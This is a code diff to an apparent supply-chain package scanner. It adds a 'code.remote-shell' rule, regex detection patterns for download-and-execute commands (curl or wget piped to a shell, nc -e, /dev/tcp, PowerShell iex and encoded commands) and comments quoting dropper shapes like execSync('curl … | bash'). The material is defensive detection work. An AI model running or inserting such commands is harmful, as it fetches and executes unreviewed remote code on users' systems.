+const BLOCK_COMMENT_CLOSE = /\*\//;
+
+/**
+ * `firstMatchingLine`, but blind to comment-only lines.
+ *
+ * The capability regexes match command *strings*, and a shell command quoted in
+ * prose is documentation, not a capability: an SDK that writes
+ * `// equivalent to: curl -X POST https://api…` is describing its own HTTP call,
+ * not shelling out. Matching those raises a finding on a package that does
+ * nothing, which is the expensive direction of a false positive.
+ *
+ * Line numbers still count comment lines, so a hit keeps pointing at the real
+ * line in the original file.
+ */
+export function firstMatchingCodeLine(
+  text: string | undefined | null,
+  patterns: RegExp[],
+): number | undefined {
+  if (!text) return undefined;
+  const lines = text.split("\n");
+  let inBlockComment = false;
+  for (let index = 0; index < lines.length; index += 1) {
+    const line = lines[index];
+    const wasInBlockComment = inBlockComment;
+    if (inBlockComment) {
+      if (BLOCK_COMMENT_CLOSE.test(line)) inBlockComment = false;
+    } else if (BLOCK_COMMENT_OPEN.test(line)) {
+      inBlockComment = true;
+    }
+    if (wasInBlockComment || LINE_COMMENT_START.test(line)) continue;
+    for (const pattern of patterns) {
+      pattern.lastIndex = 0;
+      if (pattern.test(line)) return index + 1;
+    }
+  }
+  return undefined;
+}
+
 export function firstMatchingSourceLine(
   text: string | undefined | null,
   patterns: RegExp[],

--- a/server/lib/public-diff/index.ts
+++ b/server/lib/public-diff/index.ts
@@ -103,11 +103,16 @@ export async function loadPublicPackageDiff(
   env: Cloudflare.Env,
   ctx: ExecutionContext,
   input: PublicDiffInput,
+  // Reported before the payload is returned so callers can attribute cost:
+  // /diff is the one surface where cache behaviour, not analysis time,
+  // dominates what a visitor experiences.
+  options: { onCacheOutcome?: (hit: boolean) => void } = {},
 ): Promise<PublicPackageDiff> {
   const adapter = requirePublicDiffAdapter(input.ecosystem);
 
   const cacheKey = await computePublicDiffCacheKey(input);
   const cached = await readPublicDiffCache(env, cacheKey);
+  options.onCacheOutcome?.(Boolean(cached));
   if (cached) return cached;
 
   const sources = await adapter.acquire(env, ctx, input);

--- a/server/lib/review/diff-annotation.ts
+++ b/server/lib/review/diff-annotation.ts
@@ -8,6 +8,7 @@ import {
   JS_PATTERN_SET,
   PYTHON_PATTERN_SET,
   safeJson,
+  SHELL_DOWNLOAD_EXECUTE_PATTERN_SET,
 } from "./rules";
 import type {
   CodePatternSet,
@@ -214,6 +215,16 @@ function patternsForFinding(
   switch (finding.ruleId) {
     case DETERMINISTIC_RULE_IDS.codeProcessExecution:
       return patterns.processExecution;
+    case DETERMINISTIC_RULE_IDS.codeRemoteShell:
+      // Both sets, because the finding's recorded line comes from whichever
+      // matched: `scripts.ts` prefers the download-and-execute line when one
+      // exists and falls back to the bare shell-tool line otherwise. Omitting
+      // this case entirely (the `default: []` below) is not a silent
+      // degradation — it removes the rule from the release delta, so a decoy
+      // `curl` in an untouched comment earlier in the file pins the finding's
+      // line to an unchanged line and the newly added dropper stops counting
+      // toward `releaseRisk`, which is exactly what the gate reads.
+      return [...patterns.remoteShell, ...SHELL_DOWNLOAD_EXECUTE_PATTERN_SET];
     case DETERMINISTIC_RULE_IDS.codeNetworkAccess:
       return patterns.networkAccess;
     case DETERMINISTIC_RULE_IDS.codeDynamicEvaluation:

--- a/server/lib/review/index.ts
+++ b/server/lib/review/index.ts
@@ -79,6 +79,7 @@ const RISK_RANK: Record<RiskLevel, number> = { low: 0, medium: 1, high: 2, criti
 // shape. computeRisk scores them by co-occurrence instead of by max severity.
 const CODE_CAPABILITY_RULE_IDS = new Set<string>([
   DETERMINISTIC_RULE_IDS.codeProcessExecution,
+  DETERMINISTIC_RULE_IDS.codeRemoteShell,
   DETERMINISTIC_RULE_IDS.codeNetworkAccess,
   DETERMINISTIC_RULE_IDS.codeDynamicEvaluation,
   DETERMINISTIC_RULE_IDS.codeCredentialAccess,
@@ -87,6 +88,12 @@ const CODE_CAPABILITY_RULE_IDS = new Set<string>([
 // tooling routinely shells out (the `legit-build-childprocess` benign hard
 // negative), so alone it is not evidence of risk. It escalates only when it
 // co-occurs with another capability.
+//
+// `code.remote-shell` is deliberately NOT weak. It used to live inside
+// process-execution, which meant a release adding
+// `execSync('curl … | bash')` scored as one weak capability and rolled up to
+// `low` — the whole shell-mediated dropper class read as benign build tooling.
+// Spawning `cc` and spawning `curl … | bash` are not the same evidence.
 const WEAK_LONE_CAPABILITY: string = DETERMINISTIC_RULE_IDS.codeProcessExecution;
 
 function severityToRisk(severity: string | null | undefined): RiskLevel {
@@ -234,7 +241,14 @@ function codeCapabilityRisk(
   if (capabilities.size === 0) return "low";
   // Two or more distinct capabilities co-occurring in one release is the
   // collect-and-exfiltrate shape: escalate even if each is individually weak.
-  if (capabilities.size >= 2) return "high";
+  // Co-occurrence is a floor, not a ceiling — a returned flat "high" would let a
+  // critical capability be *de*-escalated by the presence of a second one, which
+  // is the opposite of what co-occurrence means.
+  if (capabilities.size >= 2) {
+    let highest: RiskLevel = "high";
+    for (const [, { risk }] of capabilities) highest = combineRisk(highest, risk);
+    return highest;
+  }
   const [[ruleId, { risk, obfuscated }]] = capabilities;
   // A lone plain process-execution is benign build/CLI tooling — de-escalate. But
   // an *obfuscated* lone capability is not isolated evidence: hiding the

--- a/server/lib/review/risk.ts
+++ b/server/lib/review/risk.ts
@@ -1,5 +1,6 @@
 import type { AiReview } from "../ai-review/types";
 import { displayedAiResult } from "../ai-review/types";
+import type { FindingProfileEntry, ReleaseConsistency } from "../scan/release-memory";
 import { combineRisk, computeRisk, normalizeRisk, type Finding, type RiskLevel } from "./";
 
 export interface ScanRiskBreakdown {
@@ -9,6 +10,12 @@ export interface ScanRiskBreakdown {
   releaseFindingCount: number;
   contextFindingCount: number;
   unknownFindingCount: number;
+  /**
+   * Context findings excluded from `contextRisk`/`artifactRisk` because the same
+   * (ruleId, severity, file) entry was already in a release this organization
+   * reviewed and approved for this package. 0 when release memory did not apply.
+   */
+  priorApprovedContextFindingCount: number;
 }
 
 type RiskFinding = Finding & {
@@ -39,18 +46,101 @@ export function computeScanRisk(ruleFindings: Finding[], aiReview: AiReview): Ri
 export function computeScanRiskBreakdown(
   ruleFindings: RiskFinding[],
   aiFindings: AiReview,
+  releaseConsistency?: ReleaseConsistency | null,
 ): ScanRiskBreakdown {
   const releaseFindings = ruleFindings.filter((finding) => finding.releaseDelta === true);
   const contextFindings = ruleFindings.filter((finding) => finding.releaseDelta !== true);
+  // Release memory adjusts package context only. A release-delta finding sits on
+  // a file this release changed, so matching a prior profile entry proves
+  // nothing about the new bytes — those keep scoring in full, which is what
+  // keeps `releaseRisk` (and therefore the workflow gate) untouched.
+  const { kept: scoredContextFindings, approvedCount } = dropPriorApprovedFindings(
+    contextFindings,
+    releaseConsistency,
+  );
+  const scoredFindings =
+    approvedCount === 0 ? ruleFindings : [...releaseFindings, ...scoredContextFindings];
   return {
-    artifactRisk: computeScanRisk(ruleFindings, aiFindings),
+    artifactRisk: computeScanRisk(scoredFindings, aiFindings),
     releaseRisk: computeScanRisk(releaseFindings, aiFindings),
-    contextRisk: computeRisk(contextFindings),
+    contextRisk: computeRisk(scoredContextFindings),
     releaseFindingCount: releaseFindings.length,
     contextFindingCount: contextFindings.length,
     unknownFindingCount: contextFindings.filter((finding) => finding.diffStatus === "unknown")
       .length,
+    priorApprovedContextFindingCount: approvedCount,
   };
+}
+
+/**
+ * Remove context findings that were already present in the prior release this
+ * organization approved for this package.
+ *
+ * A test runner's `code.process-execution` findings are a property of the
+ * package, not of the release: re-anchoring every future release's headline on
+ * evidence a maintainer already accepted is how a real signal ends up buried
+ * (in production, every scan whose release delta was clean but whose package
+ * context read high was published anyway).
+ *
+ * Fails closed. Any state where the approved set can't be reconstructed exactly
+ * — no prior scan, or a `diverged` profile whose new-finding list was truncated
+ * by RELEASE_CONSISTENCY_NEW_FINDINGS_CAP — drops no findings at all.
+ *
+ * Only deterministic findings are eligible. `resolveReleaseConsistency` builds
+ * the profile from rule findings alone, so an AI finding was never compared
+ * against the approved release and a `match` says nothing about it. AI findings
+ * are projected without a `ruleId` (`projectAiReviewFindings`), which is what
+ * distinguishes them here.
+ */
+function dropPriorApprovedFindings(
+  contextFindings: RiskFinding[],
+  releaseConsistency: ReleaseConsistency | null | undefined,
+): { kept: RiskFinding[]; approvedCount: number } {
+  const none = { kept: contextFindings, approvedCount: 0 };
+  if (!releaseConsistency || !releaseConsistency.priorScanId) return none;
+
+  const eligible = (finding: RiskFinding) => Boolean(finding.ruleId);
+
+  if (releaseConsistency.status === "match" || releaseConsistency.status === "subset") {
+    // Nothing deterministic in this scan is new relative to the approved
+    // profile, so every deterministic context finding is previously-reviewed
+    // evidence.
+    const kept = contextFindings.filter((finding) => !eligible(finding));
+    return { kept, approvedCount: contextFindings.length - kept.length };
+  }
+  if (releaseConsistency.status !== "diverged") return none;
+  if (releaseConsistency.newFindings.length !== releaseConsistency.newFindingCount) return none;
+
+  // Diverged: only the multiset difference (current − approved) is new. Consume
+  // it per entry so a rule that fired three times before and four times now
+  // keeps exactly one finding scoring.
+  const newCounts = new Map<string, number>();
+  for (const entry of releaseConsistency.newFindings) {
+    const key = profileKey(entry);
+    newCounts.set(key, (newCounts.get(key) ?? 0) + 1);
+  }
+  const kept: RiskFinding[] = [];
+  for (const finding of contextFindings) {
+    if (!eligible(finding)) {
+      kept.push(finding);
+      continue;
+    }
+    const key = profileKey({
+      ruleId: finding.ruleId ?? "unknown",
+      severity: finding.severity,
+      file: finding.file,
+    });
+    const remaining = newCounts.get(key) ?? 0;
+    if (remaining > 0) {
+      newCounts.set(key, remaining - 1);
+      kept.push(finding);
+    }
+  }
+  return { kept, approvedCount: contextFindings.length - kept.length };
+}
+
+function profileKey(entry: FindingProfileEntry): string {
+  return `${entry.ruleId}\u0000${entry.severity}\u0000${entry.file}`;
 }
 
 export function normalizeScanRiskBreakdown(value: unknown): Partial<ScanRiskBreakdown> | null {
@@ -68,6 +158,12 @@ export function normalizeScanRiskBreakdown(value: unknown): Partial<ScanRiskBrea
   }
   if (typeof item.unknownFindingCount === "number") {
     out.unknownFindingCount = Math.max(0, Math.floor(item.unknownFindingCount));
+  }
+  if (typeof item.priorApprovedContextFindingCount === "number") {
+    out.priorApprovedContextFindingCount = Math.max(
+      0,
+      Math.floor(item.priorApprovedContextFindingCount),
+    );
   }
   return Object.keys(out).length ? out : null;
 }

--- a/server/lib/review/risk.ts
+++ b/server/lib/review/risk.ts
@@ -2,6 +2,7 @@ import type { AiReview } from "../ai-review/types";
 import { displayedAiResult } from "../ai-review/types";
 import type { FindingProfileEntry, ReleaseConsistency } from "../scan/release-memory";
 import { combineRisk, computeRisk, normalizeRisk, type Finding, type RiskLevel } from "./";
+import { DETERMINISTIC_RULE_IDS } from "./rules/rule-ids";
 
 export interface ScanRiskBreakdown {
   artifactRisk: RiskLevel;
@@ -100,6 +101,33 @@ export function computeScanRiskBreakdown(
  * are projected without a `ruleId` (`projectAiReviewFindings`), which is what
  * distinguishes them here.
  */
+/**
+ * Rules that never age into background noise, so an approval never discounts
+ * them.
+ *
+ * The discount's premise is that a *capability* — a test runner spawning
+ * processes, a prebuilt binary that ships every release — is a property of the
+ * package rather than of the release, so re-anchoring the headline on it buries
+ * real signal. That premise does not extend to evidence of an active compromise.
+ * If a release shipping a dropper is ever approved (a compromised maintainer
+ * account, or an approval predating the rule that catches it), the next
+ * README-only release must not report the dropper as settled background: the
+ * profile would match, the finding would move to context, and the headline
+ * would read low forever after.
+ *
+ * Kept scoring: consumer install hooks, embedded secrets, remote-shell
+ * execution, and hostile archive entries.
+ */
+const STANDING_DANGER_RULE_IDS = new Set<string>([
+  DETERMINISTIC_RULE_IDS.installScript,
+  DETERMINISTIC_RULE_IDS.installScriptPreinstall,
+  DETERMINISTIC_RULE_IDS.installScriptImplicitNodeGyp,
+  DETERMINISTIC_RULE_IDS.installScriptGypCommandSubstitution,
+  DETERMINISTIC_RULE_IDS.codeRemoteShell,
+  DETERMINISTIC_RULE_IDS.fileSecretContent,
+  DETERMINISTIC_RULE_IDS.tarSuspiciousEntry,
+]);
+
 function dropPriorApprovedFindings(
   contextFindings: RiskFinding[],
   releaseConsistency: ReleaseConsistency | null | undefined,
@@ -107,7 +135,8 @@ function dropPriorApprovedFindings(
   const none = { kept: contextFindings, approvedCount: 0 };
   if (!releaseConsistency || !releaseConsistency.priorScanId) return none;
 
-  const eligible = (finding: RiskFinding) => Boolean(finding.ruleId);
+  const eligible = (finding: RiskFinding) =>
+    Boolean(finding.ruleId) && !STANDING_DANGER_RULE_IDS.has(finding.ruleId as string);
 
   if (releaseConsistency.status === "match" || releaseConsistency.status === "subset") {
     // Nothing deterministic in this scan is new relative to the approved

--- a/server/lib/review/risk.ts
+++ b/server/lib/review/risk.ts
@@ -47,6 +47,7 @@ export function computeScanRiskBreakdown(
   ruleFindings: RiskFinding[],
   aiFindings: AiReview,
   releaseConsistency?: ReleaseConsistency | null,
+  options: { baselineComparisonSkipped?: boolean } = {},
 ): ScanRiskBreakdown {
   const releaseFindings = ruleFindings.filter((finding) => finding.releaseDelta === true);
   const contextFindings = ruleFindings.filter((finding) => finding.releaseDelta !== true);
@@ -56,7 +57,14 @@ export function computeScanRiskBreakdown(
   // keeps `releaseRisk` (and therefore the workflow gate) untouched.
   const { kept: scoredContextFindings, approvedCount } = dropPriorApprovedFindings(
     contextFindings,
-    releaseConsistency,
+    // Release memory's premise is "this evidence was reviewed before and
+    // nothing changed". With no baseline downloaded, nothing was compared, so
+    // the second half cannot be established: every finding is annotated
+    // `unknown` context, which would otherwise hand the whole scan to the
+    // adjustment and let a matching profile grade an uncompared release as
+    // clean. The profile is (ruleId, severity, file) — identical bytes are not
+    // implied.
+    options.baselineComparisonSkipped ? null : releaseConsistency,
   );
   const scoredFindings =
     approvedCount === 0 ? ruleFindings : [...releaseFindings, ...scoredContextFindings];

--- a/server/lib/review/rules/file-types.ts
+++ b/server/lib/review/rules/file-types.ts
@@ -38,6 +38,61 @@ export function isPythonMetadataPath(path: string): boolean {
   return /(^|\/)[^/]*\.(?:dist-info|egg-info)\/metadata$/.test(normalized);
 }
 
+const BUILD_INFRASTRUCTURE_BASENAMES = new Set([
+  "dockerfile",
+  "containerfile",
+  "jenkinsfile",
+  "makefile",
+  "gnumakefile",
+  "vagrantfile",
+  ".gitlab-ci.yml",
+  ".gitlab-ci.yaml",
+  ".travis.yml",
+  "azure-pipelines.yml",
+  "azure-pipelines.yaml",
+  "cloudbuild.yaml",
+  "appveyor.yml",
+]);
+const BUILD_INFRASTRUCTURE_DIRECTORIES = [
+  ".github/workflows/",
+  ".github/actions/",
+  ".circleci/",
+  ".buildkite/",
+  ".devcontainer/",
+];
+
+/**
+ * CI, container, and build-orchestration configuration shipped inside a package.
+ *
+ * These files describe how the *project* is built on a maintainer's or a CI
+ * runner's machine. Nothing in them executes when a consumer installs the
+ * package, so the standard bootstrap idiom every one of them contains —
+ * `RUN curl -fsSL https://deb.nodesource.com/setup_18.x | bash -`,
+ * `- run: curl -LsSf https://astral.sh/uv/install.sh | sh` — is not a
+ * download-and-execute capability against a consumer.
+ *
+ * This matters most for PyPI: an sdist ships the whole repository tree, and a
+ * first gated release has no baseline, so every one of those files reads as
+ * `added` and lands in the release delta. Treating them as executable would
+ * reject a maintainer's first release over their own CI config.
+ *
+ * They are still scanned by every other rule — secret content in a workflow file
+ * is very much a finding — this only withholds the "no benign reading" exemption
+ * that lets download-and-execute skip the executor requirement.
+ */
+export function isBuildInfrastructurePath(path: string): boolean {
+  const normalized = path.replaceAll("\\", "/").replace(/^\.\//, "").toLowerCase();
+  const withoutPackage = normalized.startsWith("package/") ? normalized.slice(8) : normalized;
+  if (BUILD_INFRASTRUCTURE_DIRECTORIES.some((dir) => withoutPackage.includes(dir))) return true;
+
+  const basename = withoutPackage.split("/").at(-1) ?? "";
+  if (!basename) return false;
+  if (BUILD_INFRASTRUCTURE_BASENAMES.has(basename)) return true;
+  // `Dockerfile.alpine`, `Dockerfile.prod`, `Makefile.am`.
+  const stem = basename.split(".")[0];
+  return stem === "dockerfile" || stem === "containerfile" || stem === "makefile";
+}
+
 const TEST_DIRECTORY_SEGMENTS = new Set(["test", "tests", "__tests__", "spec", "specs"]);
 
 // Test-suite files shipped inside a package (a test runner's own test/ tree,

--- a/server/lib/review/rules/index.ts
+++ b/server/lib/review/rules/index.ts
@@ -10,7 +10,7 @@ import { entrypointDiffFindings } from "./entrypoints";
 // way that should invalidate cached scan reports. Stored alongside each finding
 // so historical reports can be traced back to the ruleset that produced them.
 // Lives here (not in a family module) because versioning spans every family.
-export const DETERMINISTIC_RULES_VERSION = "1.18.0";
+export const DETERMINISTIC_RULES_VERSION = "1.19.0";
 
 export { DETERMINISTIC_RULE_IDS } from "./rule-ids";
 export {
@@ -20,6 +20,7 @@ export {
   PYTHON_PATTERN_SET,
   PYTHON_EXECUTION_CAPABILITY_PATTERNS,
   SECRET_PATTERNS,
+  SHELL_DOWNLOAD_EXECUTE_PATTERN_SET,
 } from "./patterns";
 export { safeJson } from "./helpers";
 export type { DeterministicFindingOptions } from "./context";

--- a/server/lib/review/rules/patterns.ts
+++ b/server/lib/review/rules/patterns.ts
@@ -59,10 +59,17 @@ const SHELL_NETWORK_TOOL_PATTERNS = [
 // command. Unlike a bare shell tool there is no benign reading of these — a
 // release that adds one is fetching and running code it did not ship.
 const SHELL_DOWNLOAD_EXECUTE_PATTERNS = [
-  /\b(?:curl|wget)\b[^\n|;&]*\|\s*(?:sudo\s+)?(?:ba|z|k|da)?sh\b/i,
-  /\b(?:curl|wget)\b[^\n|;&]*\|\s*(?:sudo\s+)?(?:python|perl|ruby|node)\b/i,
+  // The interpreter may sit behind any number of intermediate pipe stages
+  // (`| base64 -d | bash`, `| gunzip | sh` — the standard obfuscated forms), an
+  // absolute path (`| /bin/bash`), and a privilege/environment prefix
+  // (`| sudo -E bash`, `| env bash`). The trailing `\b` is what keeps
+  // `| sha256sum` and `| shasum` out.
+  /\b(?:curl|wget)\b[^\n;&]*\|\s*(?:(?:sudo|env|command|exec|xargs)(?:\s+-{1,2}\w+)*\s+)*(?:\S*\/)?(?:ba|z|k|da)?sh\b/i,
+  /\b(?:curl|wget)\b[^\n;&]*\|\s*(?:(?:sudo|env|command|exec|xargs)(?:\s+-{1,2}\w+)*\s+)*(?:\S*\/)?(?:python[\d.]*|perl|ruby|node)\b/i,
   /\$\(\s*(?:curl|wget)\b/i,
   /<\(\s*(?:curl|wget)\b/i,
+  // Backtick command substitution: `` eval `curl -s https://x` ``.
+  /`\s*(?:curl|wget)\b/i,
   /\bnc\s[^\n]*\s-e\s/,
   /(?:\bInvoke-WebRequest\b|\.DownloadString\s*\(|\biwr\b)[^\n]*\|\s*(?:iex|Invoke-Expression)\b/i,
   /\bpowershell\b[^\n]*\s-(?:enc|EncodedCommand)\b/i,

--- a/server/lib/review/rules/patterns.ts
+++ b/server/lib/review/rules/patterns.ts
@@ -2,17 +2,22 @@ import type { CodePatternSet } from "..";
 
 export const CONSUMER_INSTALL_LIFECYCLE_SCRIPTS = ["preinstall", "install", "postinstall"];
 
+// An interpreter handed a command string instead of an argv vector. Real build
+// tooling does this constantly, so it stays inside process-execution — the
+// weak-on-its-own capability — exactly as it did before the remote-shell split.
+const SHELL_INTERPRETER_PATTERNS = [
+  /\b(?:ba|z|k|da)?sh\s+-c\b/,
+  /\bpowershell\s/i,
+  /\bpwsh\s/i,
+  /\bcmd(?:\.exe)?\s+\/c\b/i,
+];
 const JS_PROCESS_EXECUTION_PATTERNS = [
   /\bchild_process\b/,
   /\bexecSync\b/,
   /\bexecFileSync\b/,
   /\bspawn\(/,
   /\bspawnSync\(/,
-  /\bcurl\s/,
-  /\bwget\s/,
-  /\bnc\s/,
-  /\bbash\s+-c/,
-  /\bpowershell\s/,
+  ...SHELL_INTERPRETER_PATTERNS,
 ];
 const PYTHON_PROCESS_EXECUTION_PATTERNS = [
   /\bsubprocess\b/,
@@ -22,6 +27,52 @@ const PYTHON_PROCESS_EXECUTION_PATTERNS = [
   /\bpty\.spawn\s*\(/,
   /\bcommands\.getoutput\s*\(/,
 ];
+
+// Shell *commands*, not spawn *APIs*. The process-execution patterns above match
+// the language-level call that starts a subprocess; these match the command
+// string handed to it. The distinction matters because a lone process spawn is
+// weak evidence (build tooling shells out constantly) while a shell command that
+// reaches the *network* is not — and neither the JS nor the Python network
+// patterns can see it, because both model in-language APIs. So
+// `execSync('curl … | bash')` used to score as a single weak capability and the
+// whole release rolled up to low.
+//
+// Command strings are language-agnostic, so both ecosystems share these sets.
+const SHELL_NETWORK_TOOL_PATTERNS = [
+  /\bcurl\s/,
+  /\bwget\s/,
+  // `nc` requires a flag. Bare `\bnc\s` reads a two-letter identifier as a
+  // reverse shell: `nc` is a ubiquitous variable name in scientific Python
+  // (`nc = netCDF4.Dataset(...)`), and no real netcat invocation omits flags.
+  /\bnc\s+-\w/,
+  /\bnetcat\s/,
+  // bash's virtual TCP device: `exec 3<>/dev/tcp/host/port` is the dependency-
+  // free reverse-shell primitive when curl/nc are unavailable.
+  /\/dev\/tcp\//,
+  /\bInvoke-WebRequest\b/i,
+  // Case-sensitive and call-shaped. PowerShell's is `(New-Object
+  // Net.WebClient).DownloadString(...)`; a case-insensitive bare word also
+  // matched the common JavaScript `downloadString(text, filename)` helper.
+  /\.DownloadString\s*\(/,
+];
+// Download-and-execute: a network tool composed with an interpreter in one
+// command. Unlike a bare shell tool there is no benign reading of these — a
+// release that adds one is fetching and running code it did not ship.
+const SHELL_DOWNLOAD_EXECUTE_PATTERNS = [
+  /\b(?:curl|wget)\b[^\n|;&]*\|\s*(?:sudo\s+)?(?:ba|z|k|da)?sh\b/i,
+  /\b(?:curl|wget)\b[^\n|;&]*\|\s*(?:sudo\s+)?(?:python|perl|ruby|node)\b/i,
+  /\$\(\s*(?:curl|wget)\b/i,
+  /<\(\s*(?:curl|wget)\b/i,
+  /\bnc\s[^\n]*\s-e\s/,
+  /(?:\bInvoke-WebRequest\b|\.DownloadString\s*\(|\biwr\b)[^\n]*\|\s*(?:iex|Invoke-Expression)\b/i,
+  /\bpowershell\b[^\n]*\s-(?:enc|EncodedCommand)\b/i,
+];
+const SHELL_REMOTE_PATTERNS = [...SHELL_NETWORK_TOOL_PATTERNS, ...SHELL_DOWNLOAD_EXECUTE_PATTERNS];
+
+// Exported for the risk layer: a shell network tool is an egress sink for the
+// credential collect-and-exfiltrate chain exactly like `fetch()` is.
+export const SHELL_NETWORK_TOOL_PATTERN_SET = SHELL_NETWORK_TOOL_PATTERNS;
+export const SHELL_DOWNLOAD_EXECUTE_PATTERN_SET = SHELL_DOWNLOAD_EXECUTE_PATTERNS;
 const JS_NETWORK_ACCESS_PATTERNS = [
   /\brequire\(["'](?:node:)?(?:http|https|net|dns)["']\)/,
   /\bfrom\s+["'](?:node:)?(?:http|https|net|dns)["']/,
@@ -95,12 +146,14 @@ const PYTHON_CREDENTIAL_ACCESS_PATTERNS = [
 
 export const JS_PATTERN_SET = {
   processExecution: JS_PROCESS_EXECUTION_PATTERNS,
+  remoteShell: SHELL_REMOTE_PATTERNS,
   networkAccess: JS_NETWORK_ACCESS_PATTERNS,
   dynamicEvaluation: JS_DYNAMIC_EVALUATION_PATTERNS,
   credentialAccess: JS_CREDENTIAL_ACCESS_PATTERNS,
 };
 export const PYTHON_PATTERN_SET = {
   processExecution: PYTHON_PROCESS_EXECUTION_PATTERNS,
+  remoteShell: SHELL_REMOTE_PATTERNS,
   networkAccess: PYTHON_NETWORK_ACCESS_PATTERNS,
   dynamicEvaluation: PYTHON_DYNAMIC_EVALUATION_PATTERNS,
   credentialAccess: PYTHON_CREDENTIAL_ACCESS_PATTERNS,
@@ -108,9 +161,12 @@ export const PYTHON_PATTERN_SET = {
 
 // Python process-execution, network, and dynamic-evaluation capability in one set.
 // Reused by ecosystem adapters that need to know whether a file executes code
-// (e.g. a PyPI sdist's setup.py, which pip runs at install time).
+// (e.g. a PyPI sdist's setup.py, which pip runs at install time). Shell commands
+// are included: a setup.py that shells out to curl executes code at install time
+// just as surely as one that calls subprocess directly.
 export const PYTHON_EXECUTION_CAPABILITY_PATTERNS = [
   ...PYTHON_PROCESS_EXECUTION_PATTERNS,
+  ...SHELL_REMOTE_PATTERNS,
   ...PYTHON_NETWORK_ACCESS_PATTERNS,
   ...PYTHON_DYNAMIC_EVALUATION_PATTERNS,
 ];

--- a/server/lib/review/rules/rule-ids.ts
+++ b/server/lib/review/rules/rule-ids.ts
@@ -2,6 +2,7 @@ export const DETERMINISTIC_RULE_IDS = {
   installScriptPreinstall: "install-script.preinstall",
   installScript: "install-script.lifecycle",
   codeProcessExecution: "code.process-execution",
+  codeRemoteShell: "code.remote-shell",
   codeNetworkAccess: "code.network-access",
   codeDynamicEvaluation: "code.dynamic-evaluation",
   codeCredentialAccess: "code.credential-access",

--- a/server/lib/review/rules/scripts.ts
+++ b/server/lib/review/rules/scripts.ts
@@ -1,7 +1,11 @@
 import { hasImplicitNodeGypInstall, isRootGypPath } from "../../tar-parser.js";
 import { firstMatchingLine, firstMatchingSourceLine } from "../../platform/text-utils";
 import type { Finding } from "..";
-import { CONSUMER_INSTALL_LIFECYCLE_SCRIPTS } from "./patterns";
+import {
+  CONSUMER_INSTALL_LIFECYCLE_SCRIPTS,
+  SHELL_DOWNLOAD_EXECUTE_PATTERN_SET,
+  SHELL_NETWORK_TOOL_PATTERN_SET,
+} from "./patterns";
 import { firstJsonPropertyLine, tag, testScope } from "./helpers";
 import { changedPrefix, isUnreachableTestFile, type RuleContext } from "./context";
 import { isDocumentationPath, isPythonMetadataPath, isTypeDeclarationPath } from "./file-types";
@@ -154,6 +158,27 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       normalized,
       packedObfuscation,
     );
+    const remoteShell = matchCategory(
+      ctx.patterns.remoteShell,
+      sample,
+      normalized,
+      packedObfuscation,
+    );
+    const downloadExecute = matchCategory(
+      SHELL_DOWNLOAD_EXECUTE_PATTERN_SET,
+      sample,
+      normalized,
+      packedObfuscation,
+    );
+    // A shell network tool is a real egress sink, so it counts as network access
+    // for the credential collect-and-exfiltrate chain below even though the
+    // in-language network patterns cannot see it.
+    const shellNetworkTool = matchCategory(
+      SHELL_NETWORK_TOOL_PATTERN_SET,
+      sample,
+      normalized,
+      packedObfuscation,
+    );
     const networkAccess = matchCategory(
       ctx.patterns.networkAccess,
       sample,
@@ -178,8 +203,44 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       packedObfuscation,
     );
     const adjacentExecutionRisk =
-      processExecution.matched || dynamicEvaluation.matched || credentialAccess.matched;
+      processExecution.matched ||
+      shellNetworkTool.matched ||
+      dynamicEvaluation.matched ||
+      credentialAccess.matched;
 
+    // A shell command is only a capability if something in reach can run it.
+    // The patterns match a command *string*, and comments are not stripped
+    // before matching, so an SDK that documents its HTTP API the usual way
+    // (`// equivalent to: curl -X POST …`) would otherwise raise a high finding
+    // on prose. Requiring a spawn API in the same file, or a lifecycle hook
+    // pointing at it, keeps the dropper shape and drops the documentation.
+    // Download-and-execute is exempt: `curl … | bash` has no benign reading
+    // even in a comment, and a package that ships that line as an instruction
+    // is still telling someone to run it.
+    const shellExecutable =
+      processExecution.matched || lifecycleScriptFile || downloadExecute.matched;
+    if (remoteShell.matched && shellExecutable) {
+      findings.push(
+        testScope(
+          testScoped,
+          remoteShell.obfuscated,
+          tag("codeRemoteShell", {
+            // Download-and-execute has no benign reading; a bare shell tool
+            // paired with a spawn API does, so it sits one step below.
+            severity: downloadExecute.matched ? "critical" : "high",
+            file: file.path,
+            line: downloadExecute.matched ? downloadExecute.line : remoteShell.line,
+            evidence: downloadExecute.matched
+              ? `${prefix}shell command downloads and executes remote code`
+              : `${prefix}shell command with network or inline-interpreter capability`,
+            reason: downloadExecute.matched
+              ? "the command fetches code over the network and pipes it straight into an interpreter, so the package runs bytes it never shipped and no reviewer can see"
+              : "shell commands reach the network and re-enter an interpreter outside the language-level APIs the other capability rules model, so this executes code the package did not ship",
+            ...(remoteShell.obfuscated ? { obfuscated: true } : {}),
+          }),
+        ),
+      );
+    }
     if (processExecution.matched) {
       findings.push(
         testScope(
@@ -238,7 +299,7 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       // is high regardless of whether the file is newly added or a modification
       // to an existing module (the shape behind file-based credential stealers).
       // Credential access on its own stays high only when added.
-      const exfiltrationSink = networkAccess.matched;
+      const exfiltrationSink = networkAccess.matched || shellNetworkTool.matched;
       // A same-file credential→network chain stays full severity even in a
       // test tree: collect-and-exfiltrate is the payload shape itself, not an
       // expected test-suite capability.

--- a/server/lib/review/rules/scripts.ts
+++ b/server/lib/review/rules/scripts.ts
@@ -1,5 +1,9 @@
 import { hasImplicitNodeGypInstall, isRootGypPath } from "../../tar-parser.js";
-import { firstMatchingLine, firstMatchingSourceLine } from "../../platform/text-utils";
+import {
+  firstMatchingCodeLine,
+  firstMatchingLine,
+  firstMatchingSourceLine,
+} from "../../platform/text-utils";
 import type { Finding } from "..";
 import {
   CONSUMER_INSTALL_LIFECYCLE_SCRIPTS,
@@ -8,7 +12,12 @@ import {
 } from "./patterns";
 import { firstJsonPropertyLine, tag, testScope } from "./helpers";
 import { changedPrefix, isUnreachableTestFile, type RuleContext } from "./context";
-import { isDocumentationPath, isPythonMetadataPath, isTypeDeclarationPath } from "./file-types";
+import {
+  isBuildInfrastructurePath,
+  isDocumentationPath,
+  isPythonMetadataPath,
+  isTypeDeclarationPath,
+} from "./file-types";
 import { scriptCommandTokens, scriptPathCandidates } from "./reachability";
 import { normalizeCodeForScanning } from "./normalize";
 
@@ -158,11 +167,17 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       normalized,
       packedObfuscation,
     );
+    // Comment-blind: a shell command quoted in prose is documentation. See
